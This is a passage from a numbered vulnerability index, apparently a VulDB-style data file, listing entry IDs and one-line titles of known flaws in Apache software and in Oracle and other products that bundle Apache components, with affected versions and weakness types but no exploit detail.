12168| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
12169| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
12170| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
12171| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
12172| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
12173| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
12174| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
12175| [127007] Apache Spark Request Code Execution
12176| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
12177| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
12178| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
12179| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
12180| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
12181| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
12182| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
12183| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
12184| [126346] Apache Tomcat Path privilege escalation
12185| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
12186| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
12187| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
12188| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
12189| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
12190| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
12191| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
12192| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
12193| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
12194| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
12195| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
12196| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
12197| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
12198| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
12199| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
12200| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
12201| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
12202| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
12203| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
12204| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
12205| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
12206| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
12207| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
12208| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
12209| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
12210| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
12211| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
12212| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
12213| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
12214| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
12215| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
12216| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
12217| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
12218| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
12219| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
12220| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
12221| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
12222| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
12223| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
12224| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
12225| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
12226| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
12227| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
12228| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
12229| [123197] Apache Sentry up to 2.0.0 privilege escalation
12230| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
12231| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
12232| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
12233| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
12234| [122800] Apache Spark 1.3.0 REST API weak authentication
12235| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
12236| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
12237| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
12238| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
12239| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
12240| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
12241| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
12242| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
12243| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
12244| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
12245| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
12246| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
12247| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
12248| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
12249| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
12250| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
12251| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
12252| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
12253| [121354] Apache CouchDB HTTP API Code Execution
12254| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
12255| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
12256| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
12257| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
12258| [120168] Apache CXF weak authentication
12259| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
12260| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
12261| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
12262| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
12263| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
12264| [119306] Apache MXNet Network Interface privilege escalation
12265| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
12266| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
12267| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
12268| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
12269| [118143] Apache NiFi activemq-client Library Deserialization denial of service
12270| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
12271| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
12272| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
12273| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
12274| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
12275| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
12276| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
12277| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
12278| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
12279| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
12280| [117115] Apache Tika up to 1.17 tika-server command injection
12281| [116929] Apache Fineract getReportType Parameter privilege escalation
12282| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
12283| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
12284| [116926] Apache Fineract REST Parameter privilege escalation
12285| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
12286| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
12287| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
12288| [115883] Apache Hive up to 2.3.2 privilege escalation
12289| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
12290| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
12291| [115518] Apache Ignite 2.3 Deserialization privilege escalation
12292| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
12293| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
12294| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
12295| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
12296| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
12297| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
12298| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
12299| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
12300| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
12301| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
12302| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
12303| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
12304| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
12305| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
12306| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
12307| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
12308| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
12309| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
12310| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
12311| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
12312| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
12313| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
12314| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
12315| [113895] Apache Geode up to 1.3.x Code Execution
12316| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
12317| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
12318| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
12319| [113747] Apache Tomcat Servlets privilege escalation
12320| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
12321| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
12322| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
12323| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
12324| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
12325| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12326| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
12327| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
12328| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
12329| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
12330| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
12331| [112885] Apache Allura up to 1.8.0 File information disclosure
12332| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
12333| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
12334| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
12335| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
12336| [112625] Apache POI up to 3.16 Loop denial of service
12337| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
12338| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
12339| [112339] Apache NiFi 1.5.0 Header privilege escalation
12340| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
12341| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
12342| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
12343| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
12344| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
12345| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
12346| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
12347| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
12348| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
12349| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
12350| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
12351| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
12352| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
12353| [112114] Oracle 9.1 Apache Log4j privilege escalation
12354| [112113] Oracle 9.1 Apache Log4j privilege escalation
12355| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
12356| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
12357| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
12358| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
12359| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
12360| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
12361| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
12362| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
12363| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
12364| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
12365| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
12366| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
12367| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
12368| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
12369| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
12370| [110701] Apache Fineract Query Parameter sql injection
12371| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
12372| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
12373| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
12374| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
12375| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
12376| [110106] Apache CXF Fediz Spring cross site request forgery
12377| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
12378| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
12379| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
12380| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
12381| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
12382| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
12383| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
12384| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
12385| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
12386| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
12387| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
12388| [108938] Apple macOS up to 10.13.1 apache denial of service
12389| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
12390| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
12391| [108935] Apple macOS up to 10.13.1 apache denial of service
12392| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
12393| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
12394| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
12395| [108931] Apple macOS up to 10.13.1 apache denial of service
12396| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
12397| [108929] Apple macOS up to 10.13.1 apache denial of service
12398| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
12399| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
12400| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
12401| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
12402| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
12403| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
12404| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
12405| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
12406| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
12407| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
12408| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
12409| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
12410| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
12411| [108782] Apache Xerces2 XML Service denial of service
12412| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
12413| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
12414| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
12415| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
12416| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
12417| [108629] Apache OFBiz up to 10.04.01 privilege escalation
12418| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
12419| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
12420| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
12421| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
12422| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
12423| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
12424| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
12425| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
12426| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
12427| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
12428| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
12429| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
12430| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
12431| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
12432| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
12433| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
12434| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
12435| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
12436| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
12437| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
12438| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
12439| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
12440| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
12441| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
12442| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
12443| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
12444| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
12445| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
12446| [107639] Apache NiFi 1.4.0 XML External Entity
12447| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
12448| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
12449| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
12450| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
12451| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
12452| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
12453| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
12454| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
12455| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
12456| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
12457| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
12458| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12459| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
12460| [107197] Apache Xerces Jelly Parser XML File XML External Entity
12461| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
12462| [107084] Apache Struts up to 2.3.19 cross site scripting
12463| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
12464| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
12465| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
12466| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
12467| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
12468| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
12469| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
12470| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
12471| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
12472| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
12473| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
12474| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
12475| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12476| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
12477| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
12478| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
12479| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
12480| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
12481| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
12482| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
12483| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
12484| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
12485| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
12486| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
12487| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
12488| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
12489| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
12490| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
12491| [105878] Apache Struts up to 2.3.24.0 privilege escalation
12492| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
12493| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
12494| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
12495| [105643] Apache Pony Mail up to 0.8b weak authentication
12496| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
12497| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
12498| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
12499| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
12500| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
12501| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
12502| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
12503| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
12504| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
12505| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
12506| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
12507| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
12508| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
12509| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
12510| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
12511| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
